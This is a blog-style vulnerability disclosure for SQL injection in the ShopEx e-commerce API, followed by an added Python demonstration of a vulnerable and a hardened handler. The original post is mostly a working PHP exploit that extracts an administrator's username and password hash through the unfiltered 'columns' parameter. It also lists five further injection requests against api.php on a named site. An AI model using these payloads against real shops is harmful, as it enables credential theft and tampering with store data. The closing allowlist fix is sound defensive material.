Analysis of the API injection vulnerability in the latest ShopEx release, with exploit (exp)

Posted on 2013-7-27 18:34:27
Vulnerable files:
\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php
core\api\payment\1.0\api_b2b_2_0_payment_cfg.php

Line 44: $data['columns'] is used without any filtering, which leads to SQL injection.
<?php
set_time_limit(0);
ob_flush();
echo 'Test: http://localhost:808'."\r\n";
// POST body: the unfiltered `columns` parameter carries the injection. The
// floor(rand(0)*2) + GROUP BY subquery forces a MySQL duplicate-key error whose
// message contains username|userpass of the first row of sdb_operators.
$sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1';
$url = 'http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0';
$ch = curl_init();
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $sql);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
flush();
$data = curl_exec($ch);
echo $data;
curl_close($ch);
?>

One more thing: ShopEx does no authentication on the API operation module, so any user can reach it. Through it an attacker can add, delete and modify product categories, types, specifications, brands and so on, and where the filtering is inadequate this also leads to injection.
Injection 1:

http://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#

Injection 2:

http://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}

Injection 3:

http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx

Injection 4:

http://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1&currency=1

Injection 5:

http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx

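The following is an added, stand-alone demonstration of the `columns` injection pattern described above and of the fix a practitioner would apply; it is not code from the post or from ShopEx. It assumes the vulnerable handler splices the caller-supplied `columns` string straight into a `SELECT ... FROM sdb_payment_cfg` statement (the post only says line 44 uses `$data['columns']` unfiltered), and it uses a constructed SQLite schema in which only the table names and the `username`/`userpass` columns come from the post. Because the post's floor(rand(0)*2)/GROUP BY error-based trick and `#` comment are MySQL-only, the payload here retrieves the same sdb_operators row with a UNION and a `--` comment instead. The hardened handler checks every requested identifier against the table's real column list, since identifiers cannot be bound as query parameters.

```python
import sqlite3

# Constructed sample schema standing in for the two ShopEx tables the post's
# payload touches. Column names other than username/userpass are assumptions
# made for this demo, not ShopEx's real schema.
SCHEMA = """
CREATE TABLE sdb_payment_cfg (id INTEGER, app_display_name TEXT, disabled INTEGER);
CREATE TABLE sdb_operators (op_id INTEGER, username TEXT, userpass TEXT);
INSERT INTO sdb_payment_cfg VALUES (1, 'Alipay', 0), (2, 'Bank transfer', 1);
INSERT INTO sdb_operators VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""

# Same idea as the post's `columns=* from sdb_payment_cfg WHERE 1 and (...)#`:
# the parameter value completes the intended SELECT list, appends its own
# query, and comments out the rest of the original statement. SQLite has no
# `#` comment and no MySQL duplicate-key error trick, so a UNION and `--` are
# used instead.
PAYLOAD = ("* from sdb_payment_cfg where 1=1 "
           "union select op_id, username, userpass from sdb_operators -- ")


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_payment_cfg_list_vuln(conn, columns, disabled):
    """Assumed shape of the vulnerable handler: the caller-controlled
    `columns` string is interpolated into the SELECT list unchecked."""
    sql = f"SELECT {columns} FROM sdb_payment_cfg WHERE disabled = {int(disabled)}"
    return conn.execute(sql).fetchall()


def search_payment_cfg_list_safe(conn, columns, disabled):
    """Hardened version: every requested column must match a real column of
    sdb_payment_cfg (identifier allowlist); the value `disabled` is bound."""
    allowed = [row[1] for row in conn.execute("PRAGMA table_info(sdb_payment_cfg)")]
    requested = allowed if columns.strip() == "*" else [c.strip() for c in columns.split(",")]
    for c in requested:
        if c not in allowed:
            raise ValueError(f"rejected column name: {c!r}")
    sql = f"SELECT {', '.join(requested)} FROM sdb_payment_cfg WHERE disabled = ?"
    return conn.execute(sql, (int(disabled),)).fetchall()


def leaked_operators(rows):
    """Return (username, userpass) pairs found in what should be payment
    config rows; a non-empty set means operator credentials were extracted
    (the demo's userpass values are 32-char hex strings, payment rows carry an int)."""
    return {(r[1], r[2]) for r in rows if isinstance(r[2], str) and len(r[2]) == 32}


if __name__ == "__main__":
    conn = open_db()
    rows = search_payment_cfg_list_vuln(conn, PAYLOAD, "1")
    print("vulnerable handler leaked:", leaked_operators(rows))
    try:
        search_payment_cfg_list_safe(conn, PAYLOAD, "1")
    except ValueError as e:
        print("hardened handler:", e)
    print("hardened handler, legitimate call:",
          search_payment_cfg_list_safe(conn, "id, app_display_name", "1"))
```

The allowlist is the important part: escaping does nothing for an identifier position, and a placeholder cannot be used there, so the only safe option is to accept column names from a fixed set (here derived from the table itself) and reject everything else. The same check applies to the `columns` parameter of search_dly_h_area in Injection 5.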